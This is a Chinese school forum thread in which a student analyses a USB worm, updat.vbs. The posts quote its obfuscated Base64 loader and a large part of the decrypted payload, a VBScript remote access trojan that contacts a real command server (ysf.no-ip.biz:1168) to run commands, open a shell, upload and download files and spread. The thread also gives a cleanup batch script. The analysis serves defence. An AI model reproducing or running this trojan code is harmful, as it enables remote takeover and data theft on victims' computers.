网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索

 
 
 
日一二三四五六
       
       
       
       
       
       

签到排名:今日本吧第个签到,

本吧因你更精彩,明天继续来努力!

本吧签到人数:0

一键签到
成为超级会员,使用一键签到
一键签到
本月漏签0次!
0
成为超级会员,赠送8张补签卡
如何使用?
点击日历上漏签日期,即可进行补签。
连续签到:天  累计签到:天
0
超级会员单次开通12个月以上,赠送连续签到卡3张
使用连续签到卡
01月31日漏签0天
西工大附中吧 关注:15,811贴子:1,039,753
  • 看贴

  • 图片

  • 吧主推荐

  • 视频

  • 游戏

  • 1 2 下一页 尾页
  • 47回复贴,共2页
  • ,跳到 页  
<<返回西工大附中吧
>0< 加载中...

Stop Hunting! updat.vbs深度解析。腿已软。。。

  • 只看楼主
  • 收藏

  • 回复
  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
让我先冷静冷静。。。。


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
不知道有没有试着用记事本打开这个updat.vbs


2026-01-31 07:44:46
广告
不感兴趣
开通SVIP免广告
  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
内容大概是:
usef = deCrypt("大串未知字符。。。")
EXECUTEGLOBAL (usef)
function deCrypt(data)
deCrypt=decodeBase64(data)
end function
Function decodeBase64(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim vijebsdv46dsvdfsv, b849ezrvb176erqbesb, gfgfd484vb68486gsdb4dfbbd
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
vijebsdv46dsvdfsv = Len(base64String)
If vijebsdv46dsvdfsv Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For gfgfd484vb68486gsdb4dfbbd = 1 To vijebsdv46dsvdfsv Step 4
Dim aezdcse, geztgrzeret, hshzrhyyhrh, reherherrtre, jetjetetheth, etjhtherehzhdrthd
aezdcse = 3
jetjetetheth = 0
For geztgrzeret = 0 To 3
hshzrhyyhrh = Mid(base64String, gfgfd484vb68486gsdb4dfbbd + geztgrzeret, 1)
If hshzrhyyhrh = "=" Then
aezdcse = aezdcse - 1
reherherrtre = 0
Else
reherherrtre = InStr(1, Base64, hshzrhyyhrh, vbBinaryCompare) - 1
End If
If reherherrtre = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
jetjetetheth = 64 * jetjetetheth + reherherrtre
Next
jetjetetheth = Hex(jetjetetheth)
jetjetetheth = String(6 - Len(jetjetetheth), "0") & jetjetetheth
etjhtherehzhdrthd = Chr(CByte("&H" & Mid(jetjetetheth, 1, 2))) + _
Chr(CByte("&H" & Mid(jetjetetheth, 3, 2))) + _
Chr(CByte("&H" & Mid(jetjetetheth, 5, 2)))
b849ezrvb176erqbesb = b849ezrvb176erqbesb & Left(etjhtherehzhdrthd, aezdcse)
Next
decodeBase64 = b849ezrvb176erqbesb
End Function


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
仔细观察,发现它其实是一段base64的解密算法!
也就是说,上面那串字符才是关键!
而且它用了EXECUTEGLOBAL .。。说明它解密出来很可能是一段代码!


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
解密结果是:
sbb5df55b8df8ngdfnndfrudybhdf = "一长串数字。。。"
sbb5df55b8df8ngdfnndfrudybhdf = SPLIT(sbb5df55b8df8ngdfnndfrudybhdf,"81899982838")
FOR X = 0 TO UBOUND(sbb5df55b8df8ngdfnndfrudybhdf) -1
BDFG15J1FD86HFD = BDFG15J1FD86HFD & ChrW(sbb5df55b8df8ngdfnndfrudybhdf(X))
NEXT
又是一层密码!这个是数字到字符转义!


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
下面还有一个EXECUTEGLOBAL 不好意思拷掉了。。。。
继续跟进!


  • 35393869
  • 巨大题库
    13
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
火钳刘明


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "ysf.no-ip.biz"
port = 1168
installdir = "%temp%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next
instance
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon


2026-01-31 07:38:46
广告
不感兴趣
开通SVIP免广告
  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
下面函数部分太长了,发不上来,有想研究的可以与我联系或者直接自行解密。。。
下面来分析这段代码。。。


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
首先,它向"ysf.no-ip.biz"这个主机的1168端口发送一个“is-ready”
然后主机回复一个字符串,然后它对这个字符串进行解析,来实现不同的功能:
处理某指令;升级;卸载;各种接收;各种发送;退出程序;挂起程序。。。
可以说是一个很全面的病毒。。。。


  • 咔小枫基格
  • 高妙物理
    14
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
火钳!!


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
瞬间腿软,幸好没有在自己家直接激动地打开。。。。
看来它比我们想象的简单破坏复杂的多。。。


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
现在让我来研究一下破解代码,当然。。。。最简单的就是做一个服务器,向全校的病毒返回uninstall就好。。。


  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
::把这段代码复制到记事本,然后改扩展名为.bat然后复制到U盘根目录下运行就好。。
@ echo off
taskkill -m wscript.exe
del updat.vbs
attrib -s -h %cd%* /s
del *.lnk


2026-01-31 07:32:46
广告
不感兴趣
开通SVIP免广告
  • TiferKing
  • ⑤考③摸
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
但是那个只能恢复U盘,我再想想怎么彻底清理电脑里的病毒。。。


登录百度账号

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!
  • 贴吧页面意见反馈
  • 违规贴吧举报反馈通道
  • 贴吧违规信息处理公示
  • 1 2 下一页 尾页
  • 47回复贴,共2页
  • ,跳到 页  
<<返回西工大附中吧
分享到:
©2026 Baidu贴吧协议|隐私政策|吧主制度|意见反馈|网络谣言警示